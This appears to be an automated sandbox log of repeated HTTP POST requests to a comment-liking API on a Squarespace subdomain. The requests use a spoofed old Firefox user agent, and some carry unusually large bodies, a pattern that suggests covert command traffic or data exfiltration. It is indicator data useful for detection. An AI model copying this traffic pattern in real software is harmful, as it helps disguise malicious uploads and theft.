Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 116736Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 336Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 336Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108426Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 332Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 332Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 108426Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 332Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 330Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /api/comment/LikeComment HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)Content-Type: application/x-www-form-urlencodedHost: plantain-elk-b8pt.squarespace.comContent-Length: 280Expect: 100-continue
